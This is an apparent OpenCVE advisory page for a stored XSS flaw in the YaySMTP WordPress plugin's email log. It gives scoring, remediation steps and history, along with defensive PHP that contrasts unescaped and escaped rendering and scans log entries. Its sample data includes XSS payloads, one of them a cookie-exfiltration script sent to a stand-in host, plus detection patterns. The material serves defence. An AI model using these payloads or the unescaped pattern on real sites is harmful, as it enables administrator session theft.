Description
The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-02-22
Score: 7.2 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Patch Immediately
AI Analysis

Impact

The SMTP for SendGrid – YaySMTP plugin for WordPress, in versions up to and including 1.4, suffers from a stored cross‑site scripting flaw (CWE-79). Insufficient input sanitization and output escaping in the email logging component let an unauthenticated attacker place arbitrary HTML and JavaScript into a stored log entry. The payload persists on the server and runs in the browser of whoever views that entry, with that user's session on the site. Since the email log is an admin-side screen, the viewer is most likely an administrator, so the injected script can read what the page shows and issue requests to the site in that administrator's name.
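The following PHP is an added illustration, not code from the YaySMTP plugin or from OpenCVE, of how an email-log viewer turns into a stored-XSS sink when a logged field is echoed unescaped, and of the two defences the advisory names (input sanitization and output escaping). The entry field names (`to`, `subject`, `status`) and the log entry itself are constructed assumptions. Inside WordPress (for example via `wp eval-file`) the real `esc_html()` and `sanitize_text_field()` are used; outside WordPress the shims defined at the top stand in for them.

```php
<?php
// Added illustration (not plugin code). Field names and the log entry below
// are assumptions; the plugin's real storage layout is not given on this page.
//
// Run inside WordPress (e.g. `wp eval-file xss-demo.php`) to use the real
// esc_html()/sanitize_text_field(); outside WordPress the shims stand in.

if (!function_exists('esc_html')) {
    // Stand-in for WordPress esc_html(): entity-encode a value for an HTML text node.
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Stand-in for WordPress sanitize_text_field(): strip tags and control characters.
    function sanitize_text_field(string $text): string {
        return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($text)));
    }
}

// Constructed log entry: the subject carries a payload that an unauthenticated
// sender could place in any field the plugin records.
$entry = [
    'to'      => 'admin@example.com',
    'subject' => '<img src=x onerror="alert(document.cookie)">',
    'status'  => 'sent',
];

// VULNERABLE pattern: the stored value is interpolated straight into the page.
function render_row_vulnerable(array $entry): string {
    return "<tr><td>{$entry['to']}</td><td>{$entry['subject']}</td><td>{$entry['status']}</td></tr>";
}

// FIXED pattern: escape at the point of output, for the context the value lands
// in (a text node here, so esc_html(); an attribute value would need esc_attr()).
function render_row_escaped(array $entry): string {
    return '<tr><td>' . esc_html($entry['to']) . '</td>'
         . '<td>' . esc_html($entry['subject']) . '</td>'
         . '<td>' . esc_html($entry['status']) . '</td></tr>';
}

// Input-side hardening at write time. It reduces what reaches storage but is
// not sufficient alone: mail subjects may legitimately contain '<' and '&', and
// sanitization cannot know which HTML context the value will later be echoed into.
function store_entry(array $entry): array {
    return array_map('sanitize_text_field', $entry);
}

echo "Vulnerable render (browser executes the onerror handler):\n",
     render_row_vulnerable($entry), "\n\n";
echo "Escaped render (payload shown as inert text):\n",
     render_row_escaped($entry), "\n\n";
echo "Escaped render of sanitized entry (tag stripped at write time):\n",
     render_row_escaped(store_entry($entry)), "\n";
```

The point of the third render is that sanitizing on the way in and escaping on the way out are complementary: the escape is what actually neutralises a payload that has already been stored, which is also why existing log entries on an affected site remain dangerous until the viewer escapes them.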

Affected Systems

Any WordPress site running the yaycommerce SMTP for SendGrid – YaySMTP plugin at version 1.4 or earlier is affected (CPE cpe:2.3:a:yaycommerce:yaysmtp:*:*:*:*:*:wordpress:*:*). The flaw sits in the plugin's email logging functionality. The advisory does not say whether email logging must be enabled for entries to be stored, so treat every install at or below 1.4 as affected until the vendor states otherwise.

Risk and Exploitability

The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N (score 7.2, high) records a flaw reachable over the network with no privileges and no user interaction at injection time, with changed scope and partial confidentiality and integrity impact; the SSVC assessment likewise marks it Automatable: yes, Exploitation: none, Technical Impact: partial. The EPSS score below 1 % estimates a low probability of in-the-wild exploitation in the near term, and the vulnerability is not listed in CISA KEV. To exploit it, an unauthenticated attacker needs only to get script into a field that the plugin records in its email log; the advisory does not detail which field or which request creates the entry. The payload then persists and runs whenever a site user or administrator views the affected log entry, giving the attacker a durable client‑side foothold in that viewer's session.

Generated by OpenCVE AI on April 22, 2026 at 02:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the SMTP for SendGrid – YaySMTP plugin to a release above 1.4. The affected range was widened from <= 1.3.1 to <= 1.4 on 2026-04-08, so confirm in the vendor changelog or the Wordfence advisory which release actually carries the fix before treating an upgrade as remediation.
  • If a patch cannot be applied immediately, disable email logging so that no new entries are stored, and review or purge existing entries. Restricting the log page to administrators does not help on its own: administrators are the users who open that page, so theirs is the browser in which a stored payload runs.
  • A web application firewall or input validation at the site edge can block obvious payloads (for example `<script`, `onerror=`, `javascript:`) in the requests whose content ends up in the log, but that is a mitigation, not a fix; the fix is context-aware output escaping where the log is rendered.

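Before an administrator opens the email-log page on a site that ran YaySMTP at or below 1.4, it is worth checking whether any stored entry already carries markup that would execute if echoed unescaped. The PHP below is an added triage helper, not part of the plugin or of OpenCVE; where the plugin keeps its log is not stated on this page, so the `$entries` array is constructed sample data standing in for whatever you load (for instance through `$wpdb` when running the file with `wp eval-file`). The indicator patterns are a deliberately broad heuristic and will flag some benign entries.

```php
<?php
// Added triage helper (not plugin code). Entries below are constructed samples;
// replace them with rows loaded from the plugin's own log storage.

const SCRIPT_INDICATORS = [
    '/<\s*script\b/i',                                                   // <script ...>
    '/<\s*(img|svg|iframe|object|embed|body|video|audio|details|math)\b/i', // tags with event-handler sinks
    '/\bon[a-z]+\s*=/i',                                                 // onerror=, onload=, onmouseover= ...
    '/javascript\s*:/i',                                                 // javascript: URLs
    '/<\s*\/?\s*[a-z][^>]*>/i',                                          // any other tag at all (lowest confidence)
];

// Return the first indicator pattern that matches, or null if the value looks clean.
function is_suspect(string $value): ?string {
    foreach (SCRIPT_INDICATORS as $re) {
        if (preg_match($re, $value)) {
            return $re;
        }
    }
    return null;
}

// Scan every string field of every entry; check the HTML-decoded form too, since
// a payload stored as &lt;script&gt; becomes live if the viewer decodes before output.
function find_suspect_entries(array $entries): array {
    $hits = [];
    foreach ($entries as $id => $entry) {
        foreach ($entry as $field => $value) {
            if (!is_string($value)) {
                continue;
            }
            $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
            foreach ([$value, $decoded] as $candidate) {
                $re = is_suspect($candidate);
                if ($re !== null) {
                    $hits[] = ['id' => $id, 'field' => $field, 'pattern' => $re, 'value' => $value];
                    break;
                }
            }
        }
    }
    return $hits;
}

// Constructed sample log entries: one clean, one script payload, one benign
// use of '<' and '>', one event handler smuggled into the recipient field.
$entries = [
    101 => ['to' => 'alice@example.com', 'subject' => 'Invoice #4432', 'status' => 'sent'],
    102 => ['to' => 'bob@example.com',
            'subject' => '<script>fetch("//evil.test/?c="+document.cookie)</script>',
            'status' => 'sent'],
    103 => ['to' => 'carol@example.com', 'subject' => '5 < 6 && 7 > 3', 'status' => 'failed'],
    104 => ['to' => '"x" onmouseover=alert(1) <x@example.com>', 'subject' => 'hi', 'status' => 'sent'],
];

foreach (find_suspect_entries($entries) as $hit) {
    printf("entry %d field %-8s matched %-45s : %s\n",
        $hit['id'], $hit['field'], $hit['pattern'], $hit['value']);
}
```

With the sample data, entries 102 and 104 are reported and 101 and 103 are not; the `5 < 6 && 7 > 3` subject shows why the last, tag-shaped pattern requires a letter after `<`. Any entry flagged this way should be deleted or rendered only through an escaping viewer, never opened in the unpatched log page.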


Advisories

Source: EUVD
ID: EUVD-2025-4439
Title: The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
(The EUVD text still carries the original <= 1.3.1 range; the range was widened to <= 1.4 on 2026-04-08, see History.)
History

Wed, 08 Apr 2026 19:30:00 +0000

Wed, 08 Apr 2026 18:30:00 +0000

Description
  Removed: The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
  Added: The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title
  Removed: SMTP for SendGrid – YaySMTP <= 1.3.1 - Unauthenticated Stored Cross-Site Scripting via Email Logs
  Added: SMTP for SendGrid – YaySMTP <= 1.4 - Unauthenticated Stored Cross-Site Scripting via Email Logs
References
  (updated)

Wed, 05 Mar 2025 22:00:00 +0000

First Time appeared
  Added: Yaycommerce; Yaycommerce yaysmtp
CPEs
  Added: cpe:2.3:a:yaycommerce:yaysmtp:*:*:*:*:*:wordpress:*:*
Vendors & Products
  Added: Yaycommerce; Yaycommerce yaysmtp

Mon, 24 Feb 2025 13:15:00 +0000

Metrics
  Added: ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Sat, 22 Feb 2025 12:45:00 +0000

Description
  Added: The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title
  Added: SMTP for SendGrid – YaySMTP <= 1.3.1 - Unauthenticated Stored Cross-Site Scripting via Email Logs
Weaknesses
  Added: CWE-79
References
  (added)
Metrics
  Added: cvssV3_1 {'score': 7.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:18:05.508Z

Reserved: 2025-01-31T00:06:27.898Z

Link: CVE-2025-0918

Vulnrichment

Updated: 2025-02-24T12:51:41.632Z

NVD

Status : Modified

Published: 2025-02-22T13:15:11.687

Modified: 2026-04-08T19:22:48.870

Link: CVE-2025-0918

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-22T02:15:05Z

Weaknesses